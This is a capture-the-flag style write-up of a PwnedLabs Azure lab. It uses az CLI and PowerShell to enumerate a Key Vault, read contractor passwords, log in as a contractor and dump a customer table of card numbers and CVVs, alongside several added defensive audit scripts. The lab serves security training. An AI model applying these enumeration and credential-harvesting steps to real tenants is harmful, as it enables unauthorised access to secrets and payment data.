2. Unlock Access with Azure Key Vault

This write-up is based on PwnedLabs.io’s free module, Unlock Access with Azure Key Vault, which offers top-notch content at an unbeatable price. While I’m not affiliated with PwnedLabs.io, I highly recommend their resources. Learn more about their subscription options at PwnedLabs.io/pricing.


Lessons Learned:

  1. Azure Key Vault ../Azure Services/Azure Key Vault
  2. Azure Storage Account ../Azure Services/Azure Storage Account
  3. Difference Between Tenant, Subscription, etc. ../Azure General/Tenant, Subscription, Resource

Given:
Username, password, login portal, and Azure Subscription ID.

Azure Subscription ID : ceff06cb-e29d-4486-a3ae-eaaec5689f94

More Info regarding Subscription ID: ../Azure General/Tenant, Subscription, Resource


2.1 Digging with GUI : Home --> Subscription.

Secrets for other users.

Settings --> Resources --> select ext-contractors --> Objects --> Keys

alissa-suarez
Version: 1795ab47daf34979b232cddb4a387f3e
Secret Identifier:
https://ext-contractors.vault.azure.net/secrets/alissa-suarez/1795ab47daf34979b232cddb4a387f3e
********

josh-harvey
Version: c5ec280997564e6da42d44797980c052
Secret Identifier:
https://ext-contractors.vault.azure.net/secrets/josh-harvey/c5ec280997564e6da42d44797980c052
********

ryan-garcia
Version: c391b4f777e341289df964dca2d0a2a9
Secret Identifier:
https://ext-contractors.vault.azure.net/secrets/ryan-garcia/c391b4f777e341289df964dca2d0a2a9
********

https://azure.microsoft.com/en-us/products/key-vault
https://learn.microsoft.com/en-us/azure/key-vault/general/overview


2.2 Digging with pwsh and the Azure CLI

Tab completion : ../Azure General/AZURE CLI Tab Completion

For login, use the credentials from the earlier lab: 1. Azure Blob Container to Initial Access


$Username = "marcus@megabigtech.com"
$Password = "*****!"
az login -u $Username -p $Password

Or as a one-liner:

az login -u marcus@megabigtech.com -p *****!


Get user information for marcus@megabigtech.com:

az account show 

{
  "environmentName": "AzureCloud",
  "homeTenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
  "id": "ceff06cb-e29d-4486-a3ae-eaaec5689f94",
  "isDefault": true,
  "managedByTenants": [],
  "name": "Microsoft Azure Sponsorship",
  "state": "Enabled",
  "tenantDefaultDomain": "megabigtech.com",
  "tenantDisplayName": "Default Directory",
  "tenantId": "2590ccef-687d-493b-ae8d-441cbab63a72",
  "user": {
    "name": "marcus@megabigtech.com",
    "type": "user"
  }
}


Then install and import the following modules. More info regarding the Microsoft Graph PowerShell module: ../Azure Services/Microsoft Graph. Microsoft Graph is a gateway to many Microsoft cloud services.

Install-Module Microsoft.Graph
Import-Module Microsoft.Graph.Users
Install-Module Az
Import-Module Az
Connect-AzAccount
Connect-MgGraph


Get-MgContext

PS> az ad signed-in-user show

{
  "@odata.context": "https://graph.microsoft.com/v1.0/$metadata#users/$entity",
  "businessPhones": [],
  "displayName": "Marcus Hutch",
  "givenName": "Marcus",
  "id": "41c178d3-c246-4c00-98f0-8113bd631676",
  "jobTitle": "Flag: ***************",
  "mail": null,
  "mobilePhone": null,
  "officeLocation": null,
  "preferredLanguage": null,
  "surname": "Hutch",
  "userPrincipalName": "marcus@megabigtech.com"
}



2.3 List the groups or directory roles a user is associated with.

../Azure General/Built-in Permissions

PS> Get-MgUserMemberOf -userid "marcus@megabigtech.com" | select * -ExpandProperty additionalProperties | Select-Object {$_.AdditionalProperties["displayName"]}

$_.AdditionalProperties["displayName"]
--------------------------------------
Directory Readers
Default Directory
All Company
PS> az ad user get-member-groups --id "marcus@megabigtech.com" --only-show-errors

[
  {
    "displayName": "All Company",
    "id": "9ec7649c-285a-47e3-90d0-953579aa30f9"
  },
  {
    "displayName": "Default Directory",
    "id": "fc185453-0e6c-4c47-829e-22608798785a"
  }
]

I tried to mimic the behavior with az but the result was missing Directory Readers. It turns out the `Get-MgUserMemberOf` command puts out much more detailed information than az.

2.4 Azure Key Vault

The Azure Key Vault ext-contractors was found using the following commands. About five key types exist.
../Azure Services/Azure Key Vault

# Given subscription ID
$CurrentSubscriptionID = "ceff06cb-e29d-4486-a3ae-eaaec5689f94"

# Set output format
$OutputFormat = "table"

# Set the given subscription as the active one
& az account set --subscription $CurrentSubscriptionID

# List resources in the current subscription
& az resource list -o $OutputFormat

Name             ResourceGroup     Location    Type                       Status
---------------  ----------------  ----------  -------------------------  --------
ext-contractors  content-static-2  eastus      Microsoft.KeyVault/vaults

You can do the same thing with:

az account set --subscription <Subscription ID>

az keyvault list

[
  {
    "id": "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.KeyVault/vaults/ext-contractors",
    "location": "eastus",
    "name": "ext-contractors",
    "resourceGroup": "content-static-2",
    "tags": {},
    "type": "Microsoft.KeyVault/vaults"
  }
]



The command below gives a lot more information about a vault:

az keyvault show --name <name>
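As an added example (not part of the lab or of PwnedLabs' material), the following PowerShell walks every vault returned by `az keyvault list`, pulls the full `az keyvault show` record for each, and reports the settings that decide how exposed the vault is: whether it uses Azure RBAC or legacy access policies, whether soft delete and purge protection are on, and the network default action. It assumes the Azure CLI is logged in with Reader on the subscription; the property names follow the Azure CLI's JSON output, and no secret values are read.

```powershell
# Added example: review the security posture of every Key Vault in the current subscription.
# Assumes the Azure CLI is installed and already logged in (az login) with at least Reader
# on the subscription. Only vault metadata is read, never secret or key material.
function Get-KeyVaultPostureReport {
    $vaults = az keyvault list -o json | ConvertFrom-Json

    foreach ($v in $vaults) {
        # 'az keyvault list' returns a summary; 'show' returns the full properties block
        $kv = az keyvault show --name $v.name -o json | ConvertFrom-Json
        $p  = $kv.properties

        # Access policies are the legacy permission model; Azure RBAC is the recommended one
        $model = if ($p.enableRbacAuthorization) { 'Azure RBAC' } else { "Access policies ($($p.accessPolicies.Count) entries)" }

        # networkAcls can be absent from the output; the service then allows all networks
        $netDefault = if ($p.networkAcls) { $p.networkAcls.defaultAction } else { 'Allow' }

        [pscustomobject]@{
            Vault           = $kv.name
            ResourceGroup   = $kv.resourceGroup
            PermissionModel = $model
            SoftDelete      = [bool]$p.enableSoftDelete
            PurgeProtection = [bool]$p.enablePurgeProtection
            RetentionDays   = $p.softDeleteRetentionInDays
            NetworkDefault  = $netDefault
            PublicAccess    = $p.publicNetworkAccess
        }
    }
}

# Full report, then only the vaults that deserve a closer look
$report = Get-KeyVaultPostureReport
$report | Format-Table -AutoSize
$report | Where-Object { -not $_.PurgeProtection -or $_.NetworkDefault -eq 'Allow' -or $_.PermissionModel -ne 'Azure RBAC' }
```

In this lab the vault of interest is ext-contractors; the same function works unchanged against any subscription the logged-in identity can read.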

2.4.1 Retrieve Password Manually

We can do this manually with az keyvault:


PS> az account set --subscription $SubscriptionID
PS> az keyvault secret show --name alissa-suarez --vault-name ext-contractors 
{
  "attributes": {
    "created": "2023-10-23T17:13:13+00:00",
    "enabled": true,
    "expires": null,
    "notBefore": null,
    "recoverableDays": 90,
    "recoveryLevel": "Recoverable+Purgeable",
    "updated": "2023-10-23T17:13:13+00:00"
  },
  "contentType": null,
  "id": "https://ext-contractors.vault.azure.net/secrets/alissa-suarez/1795ab47daf34979b232cddb4a387f3e",
  "kid": null,
  "managed": null,
  "name": "alissa-suarez",
  "tags": {},
  "value": "********"
}

2.4.2 Retrieve Password with PowerShell

Or we can automate this with PowerShell.

# Set variables
$VaultName = "ext-contractors"
$SecretNames = @("alissa-suarez", "josh-harvey", "ryan-garcia")

# Set the current Azure subscription
$SubscriptionID = "ceff06cb-e29d-4486-a3ae-eaaec5689f94"
az account set --subscription $SubscriptionID

# List and store the secrets (metadata only, no values)
$secretsJson = az keyvault secret list --vault-name $VaultName -o json
$secrets = $secretsJson | ConvertFrom-Json

# List and store the keys
$keysJson = az keyvault key list --vault-name $VaultName -o json
$keys = $keysJson | ConvertFrom-Json

# Output the secret identifiers
Write-Host "Secrets in vault $VaultName"
foreach ($secret in $secrets) {
    Write-Host $secret.id
}

# Output the key identifiers
Write-Host "Keys in vault $VaultName"
foreach ($key in $keys) {
    Write-Host $key.id
}

# Retrieve and output the secret values (needs a data-plane role such as Key Vault Secrets User)
Write-Host "Secret Values from vault $VaultName"
foreach ($SecretName in $SecretNames) {
    $secretValueJson = az keyvault secret show --name $SecretName --vault-name $VaultName -o json
    $secretValue = ($secretValueJson | ConvertFrom-Json).value
    Write-Host "$SecretName - $secretValue"
}
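The split between Key Vault Reader and Key Vault Secrets User that the role assignments later in this write-up show is worth seeing in code: Key Vault Reader can list secrets and read their metadata, while reading a value needs a data-plane role such as Key Vault Secrets User. As an added example (not from the lab or from PwnedLabs), the following PowerShell inventories the secrets in a vault from their metadata alone, flagging disabled, expired, soon-to-expire and never-expiring secrets, which is what a vault owner would run to check rotation hygiene. It assumes the Azure CLI is logged in; the vault name is the lab's, and the `-WarnDays` threshold is an arbitrary choice.

```powershell
# Added example: inventory secret metadata in a vault without reading any secret values.
# Assumes the Azure CLI is logged in. 'Key Vault Reader' is sufficient for 'secret list';
# only 'secret show' on the value needs a data-plane role, and this script never calls it.
function Get-SecretHygieneReport {
    param(
        [Parameter(Mandatory)][string]$VaultName,
        [int]$WarnDays = 30   # flag secrets that expire within this many days
    )
    $now = (Get-Date).ToUniversalTime()
    $secrets = az keyvault secret list --vault-name $VaultName -o json | ConvertFrom-Json

    foreach ($s in $secrets) {
        $a = $s.attributes
        # 'expires' is null when no expiry was set; otherwise an ISO 8601 timestamp
        $expires = if ($a.expires) { ([datetime]$a.expires).ToUniversalTime() } else { $null }

        $status = 'ok'
        if (-not $a.enabled) { $status = 'disabled' }
        elseif (-not $expires) { $status = 'no-expiry' }          # nothing forces rotation
        elseif ($expires -lt $now) { $status = 'expired' }
        elseif ($expires -lt $now.AddDays($WarnDays)) { $status = 'expiring-soon' }

        [pscustomobject]@{
            Name        = $s.name
            Enabled     = $a.enabled
            Created     = $a.created
            Expires     = $a.expires
            ContentType = $s.contentType
            Status      = $status
        }
    }
}

Get-SecretHygieneReport -VaultName 'ext-contractors' | Format-Table -AutoSize
```

Run against the lab vault, all three secrets shown above would report `no-expiry`, since their `expires` attribute is null in the `az keyvault secret show` output.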

2.4.3 Retrieve password with bash

https://cloud.hacktricks.xyz/pentesting-cloud/azure-security/az-services/keyvault#enumeration

The following script (see the HackTricks link above) enumerates the key vaults in every resource group of the subscription and writes them to a CSV file.

#!/bin/bash

# Dump all key vaults from the subscription into a CSV (vault name, resource group)

# Define Azure subscription ID
AZ_SUBSCRIPTION_ID="your-subscription-id"

# Specify the filename for output
CSV_OUTPUT="vault-names-list.csv"

# Login to Azure account
az login

# Select the desired subscription
az account set --subscription "$AZ_SUBSCRIPTION_ID"

# Retrieve all resource groups within the subscription
AZ_RESOURCE_GROUPS=$(az group list --query "[].name" -o tsv)

# Initialize the CSV file with headers
echo "Vault Name,Associated Resource Group" > "$CSV_OUTPUT"

# Iterate over each resource group
for GROUP in $AZ_RESOURCE_GROUPS
do
  # Fetch key vaults within the current resource group
  VAULT_LIST=$(az keyvault list --resource-group "$GROUP" --query "[].name" -o tsv)

  # Process each key vault
  for VAULT in $VAULT_LIST
  do
    # Confirm the vault resolves in this resource group and take its canonical name
    VAULT_NAME=$(az keyvault show --name "$VAULT" --resource-group "$GROUP" --query "name" -o tsv)

    # Append the key vault name and its resource group to the file
    echo "$VAULT_NAME,$GROUP" >> "$CSV_OUTPUT"
  done
done

2.5 Verify the user

The following commands retrieve a list of users from Entra ID for the tenant.

# List all subscriptions (and their tenants) the account has access to
az account list --all

# List users
az ad user list

# Or filter for specific users and fields with a JMESPath query
az ad user list --query "[?givenName=='Alissa' || givenName=='Josh' || givenName=='Ryan'].{Name:displayName, UPN:userPrincipalName, JobTitle:jobTitle, Id:id}"


[
  {
    "Id": "6470f625-41ce-4233-a621-fad0aa0b7300",
    "JobTitle": "Consultant (Customer DB Migration Project)",
    "Name": "Josh Harvey (Consultant)",
    "UPN": "ext.josh.harvey@megabigtech.com"
  }
]


# Another way to retrieve the ObjectID
PS> Get-MgUser -UserId ext.josh.harvey@megabigtech.com

PS> az ad user show --id "ext.josh.harvey@megabigtech.com"


2.5.1 Check assigned user group.

PS> $UserId = '6470f625-41ce-4233-a621-fad0aa0b7300'
Get-MgUserMemberOf -userid $userid | select * -ExpandProperty additionalProperties | Select-Object {$_.AdditionalProperties["displayName"]}

$_.AdditionalProperties["displayName"]
--------------------------------------
CUSTOMER-DATABASE-ACCESS
Directory Readers
Default Directory


Once again, I tried to mimic the command with az. However, the az command does not capture Directory Readers.

PS> az ad user get-member-groups --id ext.josh.harvey@megabigtech.com

[
  {
    "displayName": "Default Directory",
    "id": "fc185453-0e6c-4c47-829e-22608798785a"
  },
  {
    "displayName": "CUSTOMER-DATABASE-ACCESS",
    "id": "79b430a5-ea4d-4de6-855b-908bdfb052dc"
  }
]


From the GUI this can be verified as well:
Go to Services --> Groups --> select CUSTOMER-DATABASE-ACCESS
group objectID: 79b430a5-ea4d-4de6-855b-908bdfb052dc
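The difference seen in 2.3 and again in 2.5.1 is not a bug in az: Directory Readers is an Entra directory role, not a group. `az ad user get-member-groups` wraps the Graph getMemberGroups call, which returns groups only, whereas `Get-MgUserMemberOf` calls the user's `memberOf` relationship, which returns groups and directory roles together (each object carries its type in `@odata.type`). As an added example (not from the lab or PwnedLabs), the following PowerShell separates the two kinds of membership and shows the az equivalent via `az rest`. It assumes Connect-MgGraph has been run with permission to read directory objects and that the Azure CLI is logged in; the user is the lab's.

```powershell
# Added example: separate groups from directory roles in a user's memberOf result.
# Assumes Connect-MgGraph has been run with permission to read directory objects.
function Get-UserMembershipByType {
    param([Parameter(Mandatory)][string]$UserId)   # object id or UPN

    Get-MgUserMemberOf -UserId $UserId -All | ForEach-Object {
        [pscustomobject]@{
            # '#microsoft.graph.group' / '#microsoft.graph.directoryRole' -> 'group' / 'directoryRole'
            Type        = $_.AdditionalProperties['@odata.type'] -replace '^#microsoft\.graph\.', ''
            DisplayName = $_.AdditionalProperties['displayName']
            Id          = $_.Id
        }
    }
}

$Upn = 'ext.josh.harvey@megabigtech.com'
$memberships = Get-UserMembershipByType -UserId $Upn

# Groups only: this is the set 'az ad user get-member-groups' returns
$memberships | Where-Object Type -eq 'group'

# Directory roles: these are what 'az ad user get-member-groups' leaves out
$memberships | Where-Object Type -eq 'directoryRole'

# The same distinction from the Azure CLI, by calling the Graph memberOf endpoint directly
# (az rest acquires a Graph token for the logged-in identity on its own)
$memberOf = az rest --method get --url "https://graph.microsoft.com/v1.0/users/$Upn/memberOf" -o json | ConvertFrom-Json
$memberOf.value | Select-Object @{ n = 'Type'; e = { $_.'@odata.type' } }, displayName, id
```

For Josh Harvey the group filter yields Default Directory and CUSTOMER-DATABASE-ACCESS, matching the az output above, and the directory-role filter yields Directory Readers.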


2.6 Check User Permissions

Check the permissions of user Marcus.

PS> az role assignment list --include-groups --all | ConvertFrom-Json | Select-Object roleDefinitionName, principalName

roleDefinitionName      principalName
------------------      -------------
Key Vault Administrator ian_cloudpwned.com#EXT#@iancloudpwned.onmicrosoft.com
Key Vault Reader        marcus@megabigtech.com
Key Vault Secrets User  marcus@megabigtech.com

OR

Connect-AzAccount
Get-AzRoleAssignment -Scope "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94" | Select-Object DisplayName, RoleDefinitionName

DisplayName  RoleDefinitionName
-----------  ------------------
Ian Austin   Key Vault Administrator
Marcus Hutch Key Vault Reader
Marcus Hutch Key Vault Secrets User


Login with Harvey

Once logged in with Harvey's credentials, I was able to see more assigned roles.

az login -u *****harvey@megabigtech.com -p *****

-----



PS> Connect-AzAccount

Subscription name           Tenant
-----------------           ------
Microsoft Azure Sponsorship Default Directory


ext.josh.harvey@megabigtech.com

The following indicates that Josh Harvey is a Reader.
Based on ../Azure General/Built-in Permissions, the Reader role in Azure grants read-only access to Azure resources. However, the CUSTOMER-DATABASE-ACCESS group has the Customer Database Access role.


  
PS> Get-AzRoleAssignment -Scope "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94" | Select-Object DisplayName, RoleDefinitionName

DisplayName              RoleDefinitionName
-----------              ------------------
Ian Austin               Key Vault Administrator
Marcus Hutch             Key Vault Reader
Marcus Hutch             Key Vault Secrets User
Josh Harvey (Consultant) Reader
CUSTOMER-DATABASE-ACCESS Customer Database Access
IT-HELPDESK              Reader
Security User            Storage Blob Data Reader
Security User            Reader
Azure Security Insights  Microsoft Sentinel Automation Contributor
c7bf3d89f766471691ccdf29 Log Analytics Contributor
c7bf3d89f766471691ccdf29 Monitoring Contributor
c7bf3d89f766471691ccdf29 Monitoring Contributor
c7bf3d89f766471691ccdf29 Log Analytics Contributor
...snip

2.7 Get Role Permission for Customer Database Access

This dumps the names of all role definitions:


az role definition list | ConvertFrom-Json | Select-Object roleName


The command can be tailored to a single role:

PS> az role definition list --custom-role-only true --query "[?roleName=='Customer Database Access']" | ConvertFrom-Json

assignableScopes : {/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2}
createdBy        : 18600f1a-3cee-434e-860f-aff4078da055
createdOn        : 10/23/2023 6:42:46PM
description      : Provides access to the Mega Big Tech customer list and information about customers
id               : /subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/providers/Microsoft.Authorization/roleDefinitions/53c88309-94d8-4b15-9c6b-f64a166f4ef0
name             : 53c88309-94d8-4b15-9c6b-f64a166f4ef0
permissions      : {@{actions=System.Object[]; condition=; conditionVersion=; dataActions=System.Object[]; notActions=System.Object[]; 
                   notDataActions=System.Object[]}}
roleName         : Customer Database Access
roleType         : CustomRole
type             : Microsoft.Authorization/roleDefinitions
updatedBy        : 18600f1a-3cee-434e-860f-aff4078da055
updatedOn        : 10/24/2023 10:10:35AM
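The output above collapses the interesting part of the definition: `permissions` prints as `System.Object[]`, so the actual actions and data actions the custom role grants are not visible. As an added example (not from the lab or PwnedLabs), the following PowerShell expands every permission block of a role definition and then lists each principal holding the role, which is how an auditor would review a custom role end to end. It assumes the Azure CLI is logged in with Reader on the subscription (role definitions and assignments are readable with Reader); the role name is the lab's.

```powershell
# Added example: expand a custom role definition and list every assignment of it.
# Assumes the Azure CLI is logged in with Reader on the subscription.
function Get-RoleReport {
    param([Parameter(Mandatory)][string]$RoleName)

    $def = az role definition list --custom-role-only true --query "[?roleName=='$RoleName']" -o json | ConvertFrom-Json
    if (-not $def) { throw "Role '$RoleName' not found in the current subscription" }
    $def = $def | Select-Object -First 1

    Write-Host "Role: $($def.roleName) ($($def.name))"
    Write-Host "Assignable scopes:"
    $def.assignableScopes | ForEach-Object { Write-Host "  $_" }

    # 'permissions' is an array of blocks; each block has control-plane (actions) and
    # data-plane (dataActions) grants plus their exclusions
    foreach ($perm in $def.permissions) {
        Write-Host "Actions:";        $perm.actions        | ForEach-Object { Write-Host "  $_" }
        Write-Host "NotActions:";     $perm.notActions     | ForEach-Object { Write-Host "  $_" }
        Write-Host "DataActions:";    $perm.dataActions    | ForEach-Object { Write-Host "  $_" }
        Write-Host "NotDataActions:"; $perm.notDataActions | ForEach-Object { Write-Host "  $_" }
    }

    # Every assignment of this role at any scope, including ones granted to groups
    Write-Host "Assignments:"
    az role assignment list --all --role $def.name -o json | ConvertFrom-Json |
        Select-Object principalName, principalType, scope
}

Get-RoleReport -RoleName 'Customer Database Access'
```

For the lab role, the assignments section should show the CUSTOMER-DATABASE-ACCESS group (principalType Group) at the content-static-2 resource group scope, which is how Josh Harvey, a plain Reader on the subscription, ends up with the custom role's data actions.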

Check the storage accounts in the subscription.

More about Azure Storage Account.
../Azure Services/Azure Storage Account

2.7.1 Get Storage and table information

PS> az storage account list --query "[].name"
[
  "custdatabase",
  "mbtwebsite",
  "securityconfigs"
]

PS> az storage account list|ConvertFrom-Json|select-object name

name
----
custdatabase
mbtwebsite
securityconfigs

We can get the same information from Storage Accounts in the portal.

Then search for any tables that exist in custdatabase.

PS> az storage table list --account-name custdatabase --output table --auth-mode login

Name
---------
customers


2.7.2 Query table information

az storage entity query --table-name customers --account-name custdatabase --output table --auth-mode login

PartitionKey    RowKey    Card_expiry    Card_number       Customer_id                           Customer_name                           Cvv
--------------  --------  -------------  ----------------  ------------------------------------  --------------------------------------  -----
1               1         10/30          5425233430109903  07244ad0-c228-43d8-a48e-1846796aa6ad  SecureBank Holdings                     543
1               10        01/30          4347866885036101  cba21bec-7e8d-4394-a145-ea7f6131a998  InnoVenture                             781
1               2         09/29          4012000033330026  66d7a744-5eb6-4b1b-9e70-a36824366534  NeuraHealth                             452
1               3         05/31          4657490028942036  6a88c0ff-b79c-4842-92f1-f25d53c5cbe4  DreamScreen Entertainment               683
1               4         01/29          4657493919180161  14fb331d-a82e-41f8-8f20-d630f312dd3e  InfiNet Solutions                       855
1               5         08/29          4657490203402673  cdf53341-b806-4f69-a1e2-7b632b1d405d  Skyward Aerospace                       344
1               6         12/30          4594045518310163  c6e6418b-fc4e-4f7b-a463-1a3bc6551cd3  Quasar Analytics Inc                    145
1               7         02/29          4594055970518286  fc4f9042-5b94-4a79-b18a-40fa621fe2e1  DataGuard Inc                           243
1               8         06/30          4698558990398121  07a2cfae-16de-41a9-af51-b9cd9f077800  Huge Logistics                          546
1               9         03/30          4698559508013566  512df22d-815f-4f98-92af-a615a92ea39d  SmartMove Robotics                      992
1               99                                                                               Flag: *****